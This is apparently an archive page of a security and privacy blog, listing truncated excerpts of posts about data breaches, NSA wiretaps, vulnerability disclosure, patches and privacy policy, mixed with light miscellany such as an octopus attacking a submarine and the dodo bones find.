I love the little corners of the law that is ancient rights and privileges. They illustrate ways in which our institutions have evolved, and from where they came, we can learn much about where they may go. That’s why I was delighted to read “Russian-Israeli who Left Newfoundland and Labrador Church Sanctuary Is Deported.” Church […]

 

Newspeak Alert

Dear San Jose Mercury News, In re your article, “Date set for hearing on Google data-sharing.” It’s not sharing when you’re holding a court hearing. It’s a demand. I share my toys with my friends. The man with a gun demanded my wallet. Please make a note of it. PS: If you didn’t promulgate the […]

 

Langley, British Columbia, Canada, 1,000 medical records, courier firm

There are calls for tougher guidelines in the handling of private information after 1,000 medical files went missing when a courier car was stolen in Langley on Thursday. The courier company says the driver left the car running for less than a minute. When the car was stolen, so was a box of health records […]

 

State of Rhode Island, 4,118 or 53,000 CC, Hacker

Thousands of credit card numbers were stolen from a state government Web site that allows residents to register their cars and buy state permits, authorities said Friday. The private company that runs http://www.ri.gov said that 4,118 credit card numbers had probably been taken, a state official said. All online transactions were suspended Friday until any […]

 

Octopus vs. Submarine

Rare video footage shows a giant octopus attacking a small submarine off the west coast of Vancouver Island. Salmon researchers working on the Brooks Peninsula were shocked last November when an octopus attacked their expensive and sensitive equipment. The giant Pacific octopus weighs about 45 kilograms, powerful enough to damage Mike Wood’s remote-controlled submarine. From […]

 

Providence Home Services, 365,000 medical records, Car Thief

About 365,000 hospice and home health care patients in Oregon and Washington are being notified about the theft of computer backup data disks and tapes late last month that included personal information and confidential medical records…In an announcement yesterday, Providence Home Services, a division of Seattle-based Providence Health Systems, said the records and other data […]

 

Providence Home Services, 365, 000 people, health records, theft from employee vehicle

From Computerworld (via Slashdot) we learn that a home health care business deliberately sent patient info home with an employee as part of their disaster recovery plan. I’m serious. Now, unless this guy lives under Cheyenne Mountain, I’m saying that’s a dumb plan. Anyhoo, some of the information was encrypted, but much of it was […]

 

Choicepoint to Pay $15M Fine

Atlanta-based data aggregator ChoicePoint today agreed to pay $15 million to settle charges that it violated federal consumer protection laws when it allowed criminals to purchase sensitive financial and personal data on at least 163,000 Americans. The settlement addresses a pair of lawsuits filed against ChoicePoint by the Federal Trade Commission and represents the largest […]

 

Ameriprise, 230,000 SSNs, Stolen Laptop

On Wednesday, Ameriprise Financial, an investment advisor firm, said that a company laptop stolen from an employee’s parked car in December contained the personal information of some 230,000 customers and company advisors, The New York Times reports. The sensitive information contained in the laptop included the names and Social Security numbers of roughly 70,000 current […]

 

Introducing Debix

I’m at Black Hat Federal this week, helping introduce Debix. Of all the systems that I’ve heard about to combat identity theft, Debix’s stands far above the crowd, which is why I’ve joined their advisory board: In the physical world, we have the ability to place locks on everything from cars to safety deposit boxes […]

 

UDel breach twofer

The University of Delaware “UDaily” reports on two breaches: [A] computer in the School of Urban Affairs and Public Policy was attacked sometime between Nov. 22-26 by an unknown hacker, and it contained a portion of a database that included Social Security numbers for 159 graduate students. […] A back-up hard drive was stolen from […]

 
 

From the Do As We Say Dept.

Everyone knows that the Motion Picture Association of America is very much against unauthorized copying of movies. Then why is the MPAA admitting that it copied a movie, when it was specifically told not to by the copyright owner. The movie in question is Kirby Dick’s This Film Is Not Yet Rated. According to the […]

 

Various Oregon credit unions, debit cards, organized fraud ring?

This one seems to have slipped below the radar. From the January 25 Corvallis, Oregon Gazette-Times: Fair Isaac Corp., a Minnesota-based data security provider, late last week alerted the OSU Federal Credit Union, Citizens Bank, Benton County Schools Credit Union and Central Willamette Community Credit Union that customer debit cards bearing the Visa imprint may […]

 

NSA Wiretaps: General Hayden Speaks

In “Hayden Delivers Impassioned Defense of NSA,” Powerline excerpts Hayden’s Speech to the National Press Club (PDF). One section that jumped out at me was: GEN. HAYDEN: You know, we’ve had this question asked several times. Public discussion of how we determine al Qaeda intentions, I just — I can’t see how that can do […]

 

Two On Vulnerability Disclosure

Ed Moyle has a very good post, “Inside Oracle’s Patch Kimono,” in which he compares Oracle’s process for working with vulnerability researchers with that of Microsoft. I’d like to add two really small bits: First, I’d have compared to the (MS-dominated) Organization for Internet Safety, and second, all of these put insufficient value on secondary […]

 

Notre Dame, SSNs+CC#s+Check Images,hacker

Not much detail on this one, but it looks like a box used for fundraising purposes got 0wned. The intrusion was detected by “security software” on January 13, but the intrusion itself is said to have occurred between November 22 and January 12. [I guess they run Tripwire monthly ;^)]. Information potentially obtained by the […]

 

Lockpick Business Card

A hacker, entrepreneur, and all around mischief maker, Melvin wanted something he could give to peers and prospective clients that spoke of this nature. Talk about a card that opens doors! Via Boingboing.

 

Investing in Identity Theft: The Job Fair

For Aisha Shahid and dozens of others who went to an advertised job fair in Chattanooga and got offers of nightclub work in Atlanta, Memphis and Miami, the “dream jobs” turned out to be an identity theft scam. A man who identified himself as record company and music group president William Devon took applications and […]

 

University of Kansas, 9,200 SSNs, IT Department

[Update: Fixed headline, thanks to to anonymous.] Students who applied via the online application put out by the Department of Student Housing were alerted through either an e-mail or a letter that their private information might have been exposed. According to a University Relations news release, a computer file with names, addresses, birth dates, phone […]

 

CodeCon 2006

The program for CodeCon 2006 has been announced. CodeCon is the premier showcase of innovative software projects. It is a workshop for developers of real-world applications with working code and active development projects. All presentations will given by one of the lead developers, and accompanied by a functional demo. Early registration ends Jan 31.

 

The Trouble With Illicit

[Update: I meant to tie this more closely to “Illicit” book review, because I think this illustrates those hard choices.] There’s some fascinating competing legal goals on display in the Washington Post story “Area Police Try to Combat a Proliferation of Brothels:” “Sometimes it takes five or six interviews to break these girls [sic], to […]

 

Bank of America Customers Under Attack

The Seattle Post Intelligencer asa story, “B of A Customers Hit By Thefts,” about cash withdrawals being made overseas: According to customer service representatives at Bank of America, there have been numerous reports of checking account fraud in Seattle, but many more incidents being reported from other states. The increases in fraud reports are generally […]

 

Pro-User Zealot!

Get the bumper sticker! The background is that a Canadian MP, Sam Bulte, referred to people other than her film and music business corporate backers as “pro-user zealots” at an all candidates meeting. (Michael Geist has a good summary in “The Bulte Video, Boingboing has covered it extensively, and Technorati can help you find lots […]

 

Happy Birthday, CVE!

The sixth presentation was based on a paper titled “Towards a Common Enumeration of Vulnerabilities” by David E. Mann and Steven M. Christey from the MITRE Corporation. This presentation also generated considerable interest from the audience. They tackled the problem of dealing with several heterogeneous vulnerability databases and presented the Common Vulnerability Enumeration (CVE) mechanism […]

 

What Software Do I Like?

In a comment on “Software Usability Thoughts: Some Advice For Movable Type,” Beau Smith asks “What Mac software do you like?” That’s a tough question for three reasons: First, there’s enough decent software (consistent, attractive, discoverable) that the bad stuff can generally be avoided. Secondly, I’d like to choose examples which are either free or […]

 

UK various breaches

Deptarment of Work and Pensions, 8,800 identities Her Majesty’s Revenue and Customs (HMRC) was forced to close down the tax credits website at the start of December last year, after a spate of fraudulent claims came to light which exploited the stolen identities of Department for Work and Pensions staff. Network Rail, 4,000 identities Primarolo […]

 

Do no evil

As readers of this blog probably are already aware, Google has been subpoenaed. The United States government is demanding, in part, that they provide a list of all URLs they index. This is something I’d expect them, or any other search firm, to want to keep secret. Imagine my surprise when I read this in […]

 
 

Reacting to Web Pages

Researchers led by Dr. Gitte Lindgaard at Carleton University in Ontario wanted to find out how fast people formed first impressions. They tested users by flashing web pages for 500 msec and 50 msec onto the screen, and had participants rate the pages on various scales. The results at both time intervals were consistent between […]

 

More on "A Ping" Privacy Invasion

Before I’d had much in the way of coffee, I thought that the “Firefox Ping URLs” might offer a way to scan the web for sites to avoid. It would be simple. For each site mentioned in a ping URL, add it to a blacklist. The trouble with this is that the same set of […]

 

Firefox Ping URLs

It’s all over the internet that Mozilla has added a “ping” attribute to URLs: I’ve been meaning to blog about a new web platform feature that we’ve added to trunk builds of Firefox. It is now possible to define a ping attribute on anchor and area tags. When a user follows a link via one […]

 

Known unknowns?

Oracle has just released fixes for 82 vulnerabilities. After taking several paragraphs to say “Many experts external to Oracle feel that patches for critical vulnerabilities are too slow in coming from the esteemed database giant, and have criticized the company for its slowness in responding to reports originating with outsiders”, Brian Krebs notes that security […]

 

BSD Kernel Stack Overflow

An integer overflow in the handling of corrupt IEEE 802.11 beacon or probe response frames when scanning for existing wireless networks can result in the frame overflowing a buffer. From the FreeBSD Advisory. Researcher advisory is at Signedness.org. No word yet on if Macs are vulnerable. I think Richard at TaoSecurity sums it up well: […]

 

Brokerage account zero liability

E*Trade is implementing a program under which it will reimburse on-line fraud victims for their losses, according to a New York Times report This is an interesting step. Now the question is whether investors who prefer to use their pet’s name as a password will shift their accounts to E*Trade :^)

 

On the NSA Wiretaps

One of the noteworthy aspects to the ‘NSA Wiretap’ revelations is how it has galvanized a broad swath of people, far beyond the “usual suspects” to state that the program was a mistake, and we need to function within the rule of law. For example, Suzanne Spaulding, former assistant general counsel at the CIA: Before […]

 

Dear Recruiter

Hi, My name is () and I am a recruiter for (). I came across your name on an internet search and wanted to tell you about our opportunities available within our NYC and Houston locations. (), a key component of the firm’s () practice, provides the building blocks for a secure and protected business […]

 

Roll Clouds

These rare long clouds may form near advancing cold fronts. In particular, a downdraft from an advancing storm front can cause moist warm air to rise, cool below its dew point, and so form a cloud. When this happens uniformly along an extended front, a roll cloud may form. Image and text from “Astronomy Picture […]

 

Russell Tice and NSA Wiretaps

Democracy Now has a radio interview, downloadable in several formats, and a transcript at “National Security Agency Whistleblower Warns Domestic Spying Program Is Sign the U.S. is Decaying Into a “Police State.” Reason’s Julian Sanchez has an interview “Inside The Puzzle Palace:” REASON: You’re referring to what James Risen calls “The Program,” the NSA wiretaps […]

 

The Remittor and the Money Launderer

Ethan Zuckerman has a great post about the practicalities of international workers sending money ‘home,’ “Remittance – the big business of sending money home:” It’s difficult to overstate the importance of remittance income to most African nations and many developing nations. Nworah cites a figure of $300 billion dollars sent from diasporas to developing nations […]

 

Hotel Room Keys

For example, last fall, an IT director at a travel club in Wyomissing, Pa., told Computerworld that he had found personal information on magnetic hotel key cards when visiting three major hotel chains. The IT professional said he read the cards using a commonly available ISO-standard swipe-card reader that plugs into any USB port. At […]

 

Liberty Breeds Security

Another method, says Princeton University economist Alan B. Krueger, is to increase the civil liberties of the countries that breed terrorist groups. In an analysis of State Department data on terrorism, Krueger discovered that “countries like Saudi Arabia and Bahrain, which have spawned relatively many terrorists, are economically well off yet lacking in civil liberties. […]

 

Illinois Department of Human Services, client names and SSNs, misconfigured voicemail

“To leave a message, press ‘1234’ and listen to confidential client voicemail containing SSNs and other identifying information”. The compromised information dated back to mid-November 2005. Additional details at the Belleville News-Democrat, which notes that this is a repeat offender — the same office left unshredded confidential documents in a trash bin until the paper […]

 

Real ID Even More Expensive Than Predicted

Bruce Schneier links to an AP article about the hideous costs of the RealID Act. Early estimates were for $120 million, current estimates are for $300 million for the first year alone, and that’s just for three states, Pennsylvania, Virginia and Washington state. So we can safely say that nationally we’re looking at billions of […]

 

Quicktime WMF like Vulns on OSX and Windows

The folks at eEye and Fortinet have identified a variety of image based heap overflows that allow for arbitrary code execution on both OSX and on Windows. Also an article on news.com.com claims that the patch initially caused some issues for some users on both platforms, that have been addressed now. Seems that poor implementation […]

 

Steve Jobs and Presentations

Public speaking is an art, but like every art it depends not only on innate talent, but also on mastery of a set of technical skills which empower the artist to share their vision with an audience in a compelling way. Presentations by Steve Jobs are unique, not within the computer industry, but across business. […]

 

More Victims of Money Laundering Regulations

In a comment on “Atlantis Resort (Bahamas) 50,000, Hacker,” Ian Grigg explains that the reason Bahamas Casinos collected 55,000 SSNs is that the various and sundry “anti-money laundering” regulations force them to, or be labeled “naughty.” Err, ‘non-compliant.’ How’s that for NewSpeak? There’s a pretty large steamroller behind such rules and regulations, and the push […]

 

People's Bank of Connecticut, 90,000 SSNs, UPS & TransUnion

A computer tape from a Connecticut bank containing personal data on 90,000 customers was lost in transit recently, the bank reported today. People’s Bank, based in Bridgeport, Connecticut, is sending letters to the affected customers, it said in a statement. The tape contains information such as names, addresses, Social Security numbers and checking account numbers. […]

 

Friendster this ain't!

When you’re facing hard time, and the chips are down, you need to hunker down and dig up all the dirt you can on the stool pigeon who fingered you. That’s where whosarat.com comes in: Who’s A Rat is a database driven website designed to assist attorneys and criminal defendants with few resources. The purpose […]

 

ToggleBth

At the Windows Mobile team blog, Mike Calligaro releases a bunch of cool freeware, including a simple Bluetooth toggler. This will make demo’ing the Smurf Bluetooth logger sooo much easier. Thanks Mike!

 

Bug Scrubs and Learning From Mistakes

There’s a story at CNet, “Microsoft to hunt for new species of Windows bug:” Microsoft plans to scour its code to look for flaws similar to a recent serious Windows bug and to update its development practices to prevent similar problems in future products. Now, its’s easy to kick Microsoft for not having perfect code, […]

 

Adam's Email Troubles

This morning I got two different emails saying something like “I need an answer to that question.” Trouble is, I hadn’t seen the original emails. If you’ve sent me email lately, and not heard back, please resend it. I’m trying to respond to every email within 24 hours so I can get a clean inbox. […]

 
 

Atlantis Resort (Bahamas) 50,000, Hacker

Customers of the Atlantis resort in the Bahamas have reason to worry this week, as over 50,000 identities have been taken from the hotel’s database. The information was revealed in a document submitted to the Bahamas Securities and Exchange Commission. The information includes typical information such as names, addresses and credit card details, but also […]

 

Winnebago County (IL), Several SSNs, Winnebago County Clerk

ROCKFORD, Ill. – The Winnebago County Clerk is apologizing for releasing a list of election officials that included Social Security numbers. County Clerk Dave Johnson said an employee forgot to blacken out the numbers before giving the list of Democratic election judges to county clerk candidate Jeff Polsean. The Illinois Freedom of Information Act exempts […]

 

Brain fingerprint clears prisoner

Wow. An innocent man has been freed based upon his “brain fingerprint”. This happened over a year ago, but hey, I’ve been busy. The murder conviction of an Iowa man was overturned last year by that state’s highest court on the basis of a new technique called “brain fingerprinting”. Terry Harrington had served more than […]

 

SubDomain GPL'd

AppArmor, the security tool formerly known as SubDomain, has been released under the GPL by Novell. See the Apparmor FAQ or the CNET story, “Novell delivers security shield for Linux computers.” If you need another layer of resilience for your Linux systems, take a look.

 

Device ID and Privacy

Unique, hardcoded device IDs are bad for privacy. We hate them. Our friends hate them. So its nice to see that Microsoft is making it harder to get to them: GetDeviceUniqueID attempts to address these issues and to reduce applications dependency on the precious device id. Firstly GetDeviceUniqueID can be called from the trusted or […]

 

RFID Zapper

I’ve been mulling over John Robb’s description of the (very cool) RFID zapper the Chaos Computer Club demoed at their conference. He calls them “the German branch (privacy activists) of the global guerrilla innovation network.” He also states that “In order to correctly route and track items from inception to purchase, these chips are attached […]

 

Anonymous Blogging Wiki!

The Blog Safer Wiki was announced by the Spirit of America’s Anonymous Blogging project. There’s a lot of technology know how, and a lot of cultural issues that go into this, and Curt is doing a great job at bringing the technical knowledge to those who need it, and helping them help each other: Spirit […]

 

Google's Video "Store"

Justin Mason has some thoughts in “Google DRM and WON Authentication:” That’s interesting. In my opinion, given that quote, I’ll bet Google’s DRM is something similar to the copy-protection systems used for many games since about id’s Quake 3 and Valve’s Half-Life; an online “key server” which validates codes, tracks player IDs, and who’s viewing […]

 

"High Assurance" Certificates

Following up on previous posts on the concept of high assurance certificates (“Web Certificate Economics“), I’d like to draw attention to a CSOOnline blog post, “Phishers Now Targetting SSL:” The spoofing has taken a number of forms, which appear to be becoming highly sophisticated. They vary from exploiting browser flaws, to hacking legitimate sites or […]

 
 

Mobile Phones, Modernity, and Stress

The study, which followed more than 1,300 adults over 2 years, found that those who consistently used a mobile phone or pager throughout the study period were more likely to report negative “spillover” between work and home life — and, in turn, less satisfaction with their family life. From “Cell phones tied to family tension,” […]

 

On Grammar

I have friends who believe that grammar is handed down from on high, either by Safire, or Strunk and White, or some are strange adherents of something they call ‘Chicago.’ One of them even argues that the rules of grammar are no subject to evolution. Which is odd, given that we’re speaking really bad French, […]

 

EPIC West

I realized today that Chris Hoofnagle’s blog at EPIC West wasn’t on my blogroll. He’s had lots of important posts up lately, from the informational (“ CA OPP: 13 New Privacy Laws in Effect“) to the amusingly disgusting (“Pretexting Isn’t Lying, According to Bestpeoplesearch.com“) California’s Office of Privacy Protection just released an announcement that 13 […]

 

How to Blog for Your Company

Here at SiteAdvisor, we strongly believe in the importance of this feature. But we admit that so far we’ve done a mediocre job explaining our motivation and our initial implementation. So writes Chris Dixon in “The Role of Affiliates in Spyware, Adware, and Spam.” Chris is using the Siteadvisor blog as an extended discussion of […]

 

Beautiful Evidence, by Edward Tufte

After 9 years, I have completed Beautiful Evidence, except for the index and a few loose ends. We are currently proofing some difficult images on press, negotiating with printers, planning the order for paper and binding, and working through other production issues. Probably the major threats to breaking the schedule will be in color-correcting images […]

 

Privacy Competition in Politics

Two leading governor candidates are trying to outdo each other in protecting Minnesotans’ privacy…The candidates’ dueling news conferences produced more politics than policy, with each charging the other with not doing enough to protect citizens’ privacy. From “Governor is seeking privacy law changes.” I don’t like some of the proposals. It seems to me that […]

 

Brilliant Evil Redux

Following up with further conspiracy theory on Adam’s post, I also have to wonder just how accidental it was that a properly cryptographically signed version of the patch for WinXP was “posted to a community site” yesterday. Given the pressure to quickly product a patch combined with the one produced by Ilfak Guilfanov, it wouldn’t […]

 

WMF Patch Timing: Brilliantly Evil?

If you’ve followed the “WMF Vulnerability” that’s been all over the security blogosphere, with leaks into the mainstream media, then you know that today Microsoft released a patch. (If you don’t know this, please just go run Windows update.) I haven’t talked about it because I haven’t had much to add, but today’s release of […]

 

Microsoft, China, and Cultural Imperialism

Rebecca MacKinnon has a post on Microsoft’s removal of a blog, run by Michael Anti from their MSN Spaces blog site. (“Why Microsoft censorship in China matters to everybody.”) I’m finding the justifications and responses (both official and unofficial) to be fascinating and ultimately confusing. Matt Marshall at SiliconBeat has “Microsoft and Bokee mired in […]

 

Two Quick Notes

I’d like to remind everyone that Emergent Chaos now has three people posting, not just Adam. I see comments and links that assume I’m writing everything here, which is a little demeaning to Chris and Arthur. Also, I’d like to remind people that I maintain del.icio.us bookmarks of things I find interesting, but don’t have […]

 

The Machinery of Repression

The New York Times reports on the completion of the first phase of the treat-visitors-like-criminals US-Visit system. The article is informative, and tells us: The fingerprint check at the borders has turned up just 970 hits of visa violators or criminal suspects. The total rises to about 15,000 with inclusion of the cases identified overseas […]

 

Thoughts on Farris Hassan, the 'Iraq Teenager'

If you haven’t read about Farris Hassan and his trip, take a minute to do so. He flew to Iraq to learn what was going on. I’d like to start by congratulating the teachers at Pine Crest School. How often, today, are teachers so inspiring? The goal of school should be to develop both a […]

 

Security Stickers

Today I received a great add for a newish security company, Devicewall. They are yet another company providing a solution for prevention of intellectual property theft. They sent me a stack of humorous stickers saying things like: “This Computer is Protected by BRSD Technology. Big Red Sticker of Doom technology leverages our natural fear of […]

 

Illicit

Illicit, by Mosés Naím is a tragic book. It is considered, insightful, wide-ranging, deep, and so close to amazing. Had Naím gone just a little further, it could have been brilliant, and the tragedy is that he didn’t. Perhaps I should back up, and explain. Naím is the editor of Foreign Policy. He has written […]

 

H&R Block, Unknown # of SSNs, Mailing Labels

Stories like this one make me scratch my head and wonder, what is a breach? What should this category cover? Why do I blog these things? Why are we here? Why are you here? And what are those clowns doing over there? However, since we sent you this CD, we have become aware of a […]

 

University of San Diego, 7800 people, W-2 information, "hackers"

One that I missed. The executive summary is that somebody, somehow, got into the machine that prints W-2s for the university. The University sent out an undated disclosure letter which was very sparsely detailed — “one of the worst” seen by Beth Givens of privacyrights.org, who’s seen plenty of ’em. Story is at the San […]

 

Iowa State (again!), 3000 SSNs+2500 encrypted CC#s, "hacker"

The Des Moines Register reports on a December, 2005 breach at Iowa State: [3,000 ISU employees’] personal data might have been viewed by hackers who infiltrated two computers earlier this month. One held about 2,500 encrypted credit card numbers of athletic department donors. The second computer contained Social Security numbers for more than 3,000 ISU […]

 

Identity Theft Poster Girl

..may just have been found! The Associated Press reports that Fashion model Beverly Peele was arrested on identity theft charges for allegedly buying around $10,000 worth of housewares, appliances and furniture by using credit card numbers without permission, authorities said Friday. […] The complaint filed against the 30-year-old alleges she charged furniture, a refrigerator, a […]

 

Slipping through the analog hole

I have a number of LPs which gradually I am ripping to disc, using The Analogue Ripper (which is adequate but I’m not raving). At the moment, I’m recording an old blues album I haven’t listened to in probably ten years. Naturally, then, I thought of “The UPS Song“, which you can even listen to. […]

 

WMF Vuln fix

Courtesy of IDA Pro developer Ilfak Guilfanov. Details are available via his web log, the existence of which I learned via the seemingly indefatigable Thomas Ptacek of Matasano.

 

Totally unforeseeable.

Herbicide-resistant genetically-modified crops cross-breeding with weeds? Shocking. Via Slashdot.

 

The New York City Police Riots

… The arrest of Mayor Wood was ordered. Captain Walling of the Metropolitan Police was sent to arrest the Mayor but was promptly thrown out on his ear. Wood occupied City Hall protected by 300 of his Municipals who resisted a force of 50 Metropolitans sent there to arrest him. Later that day 50 Metropolitan […]

 

Gartner to Visa, MasterCard: Play fair

Oft-quoted Gartner analyst Avivah Litan weighs in on the intriguingly gentle treatment of Sam’s Club by Visa and MasterCard: Recommendations […] * MasterCard and Visa: Show far greater transparency in enforcing PCI standards. There is still too much confusion about the standard and how to comply with it — confusion that is increased by seemingly […]

 

Fingerprint Readers and the Economics of Privacy

I used to feel bad advocating for privacy laws. I’m generally down on laws restricting private contracts, and privacy laws seemed to be an intellectual inconsistency. I’ve resolved that feeling because almost a great many privacy invasive systems depend on either social security numbers, or government issued identity documents. It seems quite consistent to restrict […]

 

How To Train Users

[Update: I had accidentally linked an out of stock edition on Amazon. The new link has copies in stock.] Part of me thinks that training users is a cop-out. It’s a way for the technology industry to evade responsibility for the insecurity of their products, and blame customers for manufacturers’ failings. At the same time, […]

 

Mossberg's Mailbox

This week’s Mossberg’s Mailbox has a great point, that I can’t resist sharing: “However, I feel compelled to note that, if you allow your Internet usage to be totally ruled by security fears, you may miss out on a lot.” He then goes on to discuss some of the always on benefits such as automatic […]

 

Two on the Iraqi Army

A spokesman for the American military command that oversees training of the Iraqi forces also said that while he did not know the security forces’ ethnic mix, he believed that there were more Sunni troops than the election data suggested. From the New York Times, “Election Results Suggest Small Role For Sunnis in Security Forces.” […]

 

Mariott Vacation Club, 206,000 records, backup tape

Marriott International Inc.’s time-share division said yesterday that it is missing backup computer tapes containing credit card account information and the Social Security numbers of about 206,000 time-share owners and customers, as well as employees of the company. Officials at Marriott Vacation Club International said it is not clear whether the tapes, missing since mid-November, […]

 

London and Terror Threats

The BBC reports that the Mayor of London says “there had been 10 attempted attacks since 11 September 2001, two of which had come since the 7 July bombs.” (“Threat to London ‘disorganised’“) Where are the perpetrators? Are they free, because of insufficient evidence? Are they in jail? Were they killed by security forces? Claims […]

 

Those Boy Scouts…Always Building Nuclear Reactors

Now 17, David hit on the idea of building a model breeder reactor, a nuclear reactor that not only generates electricity, but also produces new fuel. His model would use the actual radioactive elements and produce real reactions. His blueprint was a schematic in one of his father’s textbooks. Ignoring safety, David mixed his radium […]

 

13 Meter Straw Goat Met His Match

I am deeply saddened to have missed this story until now: Vandals set light to a giant straw goat Saturday night in a central Swedish town, police said, an event that has happened so frequently it has almost become a Christmas tradition. It was the 22nd time that the goat had gone up in smoke […]

 

Relentless Navel Gazing, Part 6

I’ve made a bunch of changes to style and template stuff. Most noticeable should be that post titles are now links to the posts. There’s also a whole lot of consistency improvements for the Moveable Type 3.2 software. The one remaining change is to bring full (extended) entries into the RSS feed. That Mt3.2 software […]

 

BancorpSouth, 6500 debit cards, unknown

In a report remarkable for what it doesn’t say, WLBT TV of Jackson, MS reports: A possible security breach has one bank giving customers new debit cards. BancorpSouth is sending out new cards to about 6500 customers. The vice president of the banks security department says account numbers were either lost or they were somehow […]

 

USA 0, UK 1

We get Mystery Science Theater 3000, they get Badly Dubbed Porn: Badly Dubbed Porn showcases vintage soft porn movies re-dubbed with a wickedly funny soundtrack by some of Britain’s most talented comedy actors. Via the lovely and very funny Ms. Kitka.

 

Holiday Charity

I’d like to draw your attention to two worthy causes: Tor, and the Creative Commons. Larry Lessig is looking to raise money to ensure that the Creative Commons maintains their non-profit status, and the fine folks who bring you the Tor Internet privacy tool are looking for donations so they can continue their important work.

 
 

Florida workers claim outsourced HR system reveals PII, lacks audit trail

The Tallahassee Democrat reports on an interesting disclosure instance: whistleblowers revealing allegedly shoddy data security practices at their former employer. The twist is that those doing the talking are not the folks whose jobs were outsourced, but former employees of the outsourcing firm. From the article: In an affidavit taken for a lawsuit by five […]

 

US Department of Justice, several SSNs, Process Errors

The federal government is responsible for issuing Social Security numbers, but it may not be doing enough to protect these critically personal pieces of information on its own Web sites. Acting on a tip, InformationWeek was able to access Web pages that include the names and Social Security numbers of people involved in Justice Department-related […]

 

Apollo 8

From the good old days, when science was not a matter of press releases, perception management or “long held beliefs.” Click the picture for a larger version at Astronomy Picture of the Day.

 

Dodo bones

Scientists have discovered the “beautifully preserved” bones of about 20 dodos at a dig site in Mauritius. Little is known about the dodo, a famous flightless bird thought to have become extinct in the 17th century. No complete skeleton has ever been found in Mauritius, and the last full set of bones was destroyed in […]

 

Nuclear Surveillance

In search of a terrorist nuclear bomb, the federal government since 9/11 has run a far-reaching, top secret program to monitor radiation levels at over a hundred Muslim sites in the Washington, D.C., area, including mosques, homes, businesses, and warehouses, plus similar sites in at least five other cities, U.S. News has learned. In numerous […]

 

Friday Star Wars and Psychological Acceptability

This week’s Friday Star Wars Security Blogging closes the design principles series. (More on that in the first post of the series, “Economy of Mechanism.”) We close with the principle of psychological acceptability. We do so through the story that ties the six movies together: The fall and redemption of Anakin Skywalker. There are four […]

 

Shark Video

Watch this astounding video of a shark in the Seattle aquarium. I suggest turning down the volume, the only really useful thing you’ll learn is that the shark in question was about 3-4 feet long. Via TEDBlog        

 

More on Snow's Assurance Paper

This is a followup to Gunnar Peterson’s comments on “Epstein, Snow and Flake: Three Views of Software Security.” His comments are in an update to the original post, “The Road to Assurance:” None of these views, by themselves are adequate. The combination of horizontal and vertical views is what yields the most accurate picture. Obviously, […]

 

It's Chaos Out There!

In “Play Break,” Hilzoy writes: Here’s what it’s about: as most parents know, little boys tend to be more interested in toys like trucks, and little girls in toys like dolls. (I was an exception: someone gave me a doll once, and I dissected it.) There is no obvious way to decide whether this is […]

 

Do Wiretap Revelations Help the Terrorists?

The question is a fair and natural one to ask, and I’d like to examine it in depth. I think my intuitive answer (“revelations about wiretaps don’t help the terrorists”) is wrong, and that there are surprising effects of revealing investigative measures. Further, those are effects I haven’t seen discussed. Allow me to explain the […]

 

Ford, 70,000 Employee SSNs, Stolen Computer

Ford Motor Co. informed about 70,000 active and former white-collar employees that a computer with company data, including social security numbers, was stolen from a Ford facility. From the WSJ, “Ford Computer Holding Staff Data Is Reported Stolen.” “Where Identity Theft is Job #1!”

 
 

Epstein, Snow and Flake: Three Views of Software Security

Among those who understand that software is, almost without exception, full of security holes, there are at least three major orientations. I’ve recently seen three articles, all of which I wanted to talk about, but before I do I should explain how I’m using the word orientation, and the connotations it carries. As used by […]

 

Update on ABN Amro (Lasalle Bank) tape

Lasalle Bank’s tape of mortgage-related information on 2 million customers has been found by DHL. (Thanks to Adam for the heads-up) No word on whether the tape was in a container which would show evidence of tampering, so this doesn’t foreclose (pardon the pun) the possibility of PII being stolen: […]the tape had been located […]

 

Even More on the $100 Laptop

I’ve discussed the $100 laptop in “Freedom To Tinker, Freedom to Learn,” and “More on ‘Freedom To Tinker, Freedom to Learn’.” In “Tech Delusions and The Trouble with Christmas,” Kerry Howley discusses many reasons why this is a bad idea: For now, OLPC plans to sell only to governments of poor countries, not individuals here […]

 

Emergent Properties of the Long Tail

Chris Anderson warms the cockles of our heart as he discusses the psychological acceptability of “The Probabilistic Age:” When professionals–editors, academics, journalists–are running the show, we at least know that it’s someone’s job to look out for such things as accuracy. But now we’re depending more and more on systems where nobody’s in charge; the […]

 

Software Usability Thoughts: Some Advice For Movable Type

I’d like to talk a bit about usability as it intersects with software design. I’m motivated by three things: Firstly, my own attempts to be comprehensible and understandable, not only in this blog, but also in software whose design I participate in. Years ago, Steve Karkula provided me the phrase “design from interface” while doing […]

 

I'll have to check with my manager

If you watch “The Simpsons”, you’ve probably seen “Puberty Boy“, the pimply-faced kid who appears in many episodes in a variety of menial jobs. Well, it looks like he may be working for the NSA: Q If FISA didn’t work, why didn’t you seek a new statute that allowed something like this legally? ATTORNEY GENERAL […]

 

Guidance Software, 4,000 CC+CCV, Hacker

Or, “I Wonder How They Figured It Out.” Online attackers breached the security of a server at digital forensics firm Guidance Software and stole the account information of nearly 4,000 customers, the company acknowledged on Monday according to news reports. From Rob Lemos, “Customer Data Stolen From Guidance Software.”

 

Legal Analysis of the Wiretaps

One of the really cool things about blogs is that very smart, knowledgeable people can offer up their opinions on topics of the moment. In this case, it’s Orin Kerr and Daniel Solove offering up extended legal analyses of the wiretaps. (Well, extended from the lay perspective, anyway.) Professor Kerr has posted “Legal Analysis of […]

 

Snarfer RSS Reader

Some friends have just launched Snarfer, a new Windows RSS reader, designed to be fast, efficient, and easy to use. Check it out! If you’re not familiar with RSS Really Simple Syndication, it’s a way to bring lots of content, like blogs, into one place. If I didn’t have NetNewsWire (a Mac client) I couldn’t […]

 

Reeves Namepins, Unknown # Cop Credit Cards, Hacker

Reevesnamepins.com, a company that manufacturers the plastic and metal name tags that police officers around the country wear on their uniforms, had its customer database hacked recently, exposing credit card and other personal data for a number of police departments. So writes Brian Krebs in “Database Hack Exposes Police Financial Data.”

 

OSVDB Needs Programmers

The Open Source Vulnerability DataBase (OSVDB) is in need of additional programmers. If you’re not familiar with it because you’ve been hiding in a cave somewhere, OSVDB is a tremendous project that dramatically enhances the quality and availability of vulnerability information. Today, they posted a teaser, “OSVDB is Closing:” That said, OSVDB could substantially benefit […]

 

Torturing The Norms

Of a Financial Times online >poll about torture, Alice Marshall asks “ How did this even get to be part of the conversation?” Meanwhile, the BBC reports on the investigation of a Swiss Senator in “CIA abduction claims ‘credible:’” He went on: “Legal proceedings in progress in certain countries seemed to indicate that individuals had […]

 

" L'état c'est moi"

